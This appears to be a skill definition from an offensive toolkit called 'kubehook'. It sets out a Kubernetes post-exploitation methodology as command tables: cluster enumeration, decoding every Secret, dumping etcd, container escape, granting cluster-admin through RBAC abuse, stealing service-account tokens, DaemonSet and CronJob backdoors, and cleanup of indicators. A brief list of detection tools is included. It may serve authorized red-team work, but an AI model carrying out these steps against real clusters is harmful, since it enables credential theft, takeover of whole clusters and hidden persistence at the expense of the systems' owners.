| name | k8s-postexploit |
| description | Kubernetes post-exploitation for container escape, secret extraction, RBAC abuse, and cluster persistence |
| category | post-exploitation |
| tags | ["kubernetes","k8s","container","post-exploitation","rbac","escape","etcd","secrets","daemonset","cronjob"] |
| tech_stack | ["kubernetes","python","etcd"] |
| cwe_ids | ["CWE-269","CWE-522","CWE-693","CWE-250"] |
| chains_with | ["T1611","T1552.007","T1613","T1610","T1053.007"] |
| prerequisites | ["T1610","T1078"] |
| version | 1.0 |
Kubernetes Post-Exploitation Methodology
Kubernetes post-exploitation targets cluster resources, RBAC misconfigurations, container security boundaries, and etcd for secret extraction. After compromising a pod or obtaining kubeconfig, these tools provide cluster enumeration, privilege escalation, container escape, and persistent access.
Prerequisites
- Kubernetes access — kubeconfig file, service account token, or in-cluster config
- Python packages —
pip3 install kubernetes etcd3
- Current context — verify access via
kubectl auth can-i --list
kubectl cluster-info
kubectl auth can-i --list
python3 -c "from kubernetes import client; print('OK')"
Kill Chain Phases
Phase 1 — Cluster Enumeration
| Action | Command | Purpose |
|---|
| Full enumeration | kubehook k8s_enum | Map namespaces, pods, services, RBAC, ingress |
| Secret metadata | kubehook k8s_enum --namespace kube-system | Focus on high-value system namespace |
Phase 2 — Secret Extraction
| Action | Command | Purpose |
|---|
| K8s Secrets | kubehook k8s_secrets | Extract and decode all Kubernetes Secrets |
| etcd dump | kubehook etcd_dump --endpoint ENDPOINT | Direct etcd access for all secrets |
Phase 3 — Privilege Escalation
| Action | Command | Purpose |
|---|
| Container escape | kubehook k8s_escape | Detect escape vectors (privileged, hostPID, docker socket) |
| RBAC abuse | kubehook k8s_privesc --method bind_admin | Create ClusterRoleBinding for cluster-admin |
| SA token theft | kubehook k8s_privesc --method sa_token | Steal service account tokens from pods |
Phase 4 — Persistence
| Action | Command | Purpose |
|---|
| DaemonSet backdoor | kubehook k8s_backdoor --type daemonset --image IMAGE | Deploy on every node |
| CronJob backdoor | kubehook k8s_backdoor --type cronjob --image IMAGE | Periodic callback |
Phase 5 — Cleanup (MANDATORY)
kubehook cleanup_k8s
Detection Considerations
- Kubernetes Audit Logs — API server audit logging captures all requests
- Falco — Runtime security monitoring for container escape, privilege escalation
- OPA/Gatekeeper — Policy enforcement for pod security, RBAC constraints
- Network Policies — Restricts pod-to-pod and pod-to-external communication
- RBAC Analyzer — Tools like rbac-police, kubectl-who-can detect dangerous bindings
Program Reference
| Program | Technique | MITRE ATT&CK |
|---|
| k8s_enum | Cluster resource enumeration | T1613 — Container and Resource Discovery |
| k8s_secrets | Kubernetes Secret extraction | T1552.007 — Container API |
| k8s_escape | Container escape exploitation | T1611 — Escape to Host |
| k8s_privesc | RBAC privilege escalation | T1078 — Valid Accounts |
| etcd_dump | Direct etcd data extraction | T1552.007 — Container API |
| k8s_backdoor | DaemonSet/CronJob persistence | T1053.007 — Container Orchestration Job |
| cleanup_k8s | Resource removal by label selector | T1070 — Indicator Removal |